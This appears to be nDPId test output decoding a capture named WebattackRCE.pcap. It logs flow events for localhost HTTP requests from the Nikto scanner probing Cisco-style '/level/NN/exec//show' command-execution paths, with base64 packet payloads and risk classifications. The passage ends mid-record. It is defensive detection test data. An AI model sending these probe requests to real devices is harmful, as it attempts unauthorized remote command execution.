-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":573,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":573,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277595,"flow_last_seen":1576420277595,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277595,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50708,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":573,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":573,"flow_packet_id":1,"flow_last_seen":1576420277595,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277595,"pkt":"AAAAAAAAAAAAAAAACABFAADIjYJAAEAGrqt\/AAABfwAAAcYUH5BJPLV3Xqa0Y4AYAED+vAAAAQEICp1m\/oOdZv6DR0VUIC9sZXZlbC8yNS9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyNzIpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":573,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":573,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277595,"flow_last_seen":1576420277595,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277595,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50708,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/25\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001272)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":574,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":574,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277597,"flow_last_seen":1576420277597,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277597,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50710,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":574,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":574,"flow_packet_id":1,"flow_last_seen":1576420277597,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277597,"pkt":"AAAAAAAAAAAAAAAACABFAADI4QFAAEAGWyx\/AAABfwAAAcYWH5APltgJOmv38YAYAED+vAAAAQEICp1m\/oSdZv6ER0VUIC9sZXZlbC8yNi9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMjczKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":574,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":574,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277597,"flow_last_seen":1576420277597,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277597,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50710,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/26\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001273)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":575,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":575,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277598,"flow_last_seen":1576420277598,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277598,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50712,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":575,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":575,"flow_packet_id":1,"flow_last_seen":1576420277598,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277598,"pkt":"AAAAAAAAAAAAAAAACABFAADIuK1AAEAGg4B\/AAABfwAAAcYYH5AkxYBd7ezrAoAYAED+vAAAAQEICp1m\/oadZv6GR0VUIC9sZXZlbC8yNy9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyNzQpDQoNCg=="} -01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":575,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":575,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277598,"flow_last_seen":1576420277598,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277598,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50712,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/27\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001274)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":576,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":576,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277600,"flow_last_seen":1576420277600,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277600,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50714,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":576,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":576,"flow_packet_id":1,"flow_last_seen":1576420277600,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277600,"pkt":"AAAAAAAAAAAAAAAACABFAADIQiNAAEAG+gp\/AAABfwAAAcYaH5DTCnrawy0BcYAYAED+vAAAAQEICp1m\/oidZv6IR0VUIC9sZXZlbC8yOC9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMjc1KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":576,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":576,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277600,"flow_last_seen":1576420277600,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277600,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50714,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/28\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001275)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":577,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":577,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277602,"flow_last_seen":1576420277602,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277602,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50716,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":577,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":577,"flow_packet_id":1,"flow_last_seen":1576420277602,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277602,"pkt":"AAAAAAAAAAAAAAAACABFAADIalZAAEAG0dd\/AAABfwAAAcYcH5BVA1KtKWKiFYAYAED+vAAAAQEICp1m\/oqdZv6JR0VUIC9sZXZlbC8yOS9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMjc2KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":577,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":577,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277602,"flow_last_seen":1576420277602,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277602,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50716,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/29\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001276)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":578,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":578,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277604,"flow_last_seen":1576420277604,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277604,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50718,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":578,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":578,"flow_packet_id":1,"flow_last_seen":1576420277604,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277604,"pkt":"AAAAAAAAAAAAAAAACABFAADIeUZAAEAGwud\/AAABfwAAAcYeH5Dj\/UG+lxmHS4AYAED+vAAAAQEICp1m\/oudZv6LR0VUIC9sZXZlbC8zMC9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyNzcpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":578,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":578,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277604,"flow_last_seen":1576420277604,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277604,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50718,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/30\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001277)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":579,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":579,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277607,"flow_last_seen":1576420277607,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277607,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50720,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":579,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":579,"flow_packet_id":1,"flow_last_seen":1576420277607,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277607,"pkt":"AAAAAAAAAAAAAAAACABFAADISctAAEAG8mJ\/AAABfwAAAcYgH5D3W3ExGI1+2IAYAED+vAAAAQEICp1m\/o6dZv6OR0VUIC9sZXZlbC8zMS9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyNzgpDQoNCg=="} -01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":579,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":579,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277607,"flow_last_seen":1576420277607,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277607,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50720,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/31\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001278)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":580,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":580,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277608,"flow_last_seen":1576420277608,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277608,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50722,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":580,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":580,"flow_packet_id":1,"flow_last_seen":1576420277608,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277608,"pkt":"AAAAAAAAAAAAAAAACABFAADIARxAAEAGOxJ\/AAABfwAAAcYiH5DcsTnhkT\/ypIAYAED+vAAAAQEICp1m\/pCdZv6QR0VUIC9sZXZlbC8zMi9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMjc5KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":580,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":580,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277608,"flow_last_seen":1576420277608,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277608,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50722,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/32\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001279)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":581,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":581,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277609,"flow_last_seen":1576420277609,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277609,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50724,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":581,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":581,"flow_packet_id":1,"flow_last_seen":1576420277609,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277609,"pkt":"AAAAAAAAAAAAAAAACABFAADIVW1AAEAG5sB\/AAABfwAAAcYkH5Dpym2S0+8SfoAYAED+vAAAAQEICp1m\/pGdZv6RR0VUIC9sZXZlbC8zMy9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMjgwKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":581,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":581,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277609,"flow_last_seen":1576420277609,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277609,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50724,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/33\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001280)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":582,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":582,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277611,"flow_last_seen":1576420277611,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277611,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50726,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":582,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":582,"flow_packet_id":1,"flow_last_seen":1576420277611,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277611,"pkt":"AAAAAAAAAAAAAAAACABFAADIEPFAAEAGKz1\/AAABfwAAAcYmH5CKoygWHO02yYAYAED+vAAAAQEICp1m\/pOdZv6TR0VUIC9sZXZlbC8zNC9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyODEpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":582,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":582,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277611,"flow_last_seen":1576420277611,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277611,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50726,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/34\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001281)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":583,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":583,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277612,"flow_last_seen":1576420277612,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277612,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50728,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":583,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":583,"flow_packet_id":1,"flow_last_seen":1576420277612,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277612,"pkt":"AAAAAAAAAAAAAAAACABFAADILGdAAEAGD8d\/AAABfwAAAcYoH5DpvhSfS8jZeYAYAED+vAAAAQEICp1m\/pSdZv6UR0VUIC9sZXZlbC8zNS9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyODIpDQoNCg=="} -01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":583,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":583,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277612,"flow_last_seen":1576420277612,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277612,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50728,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 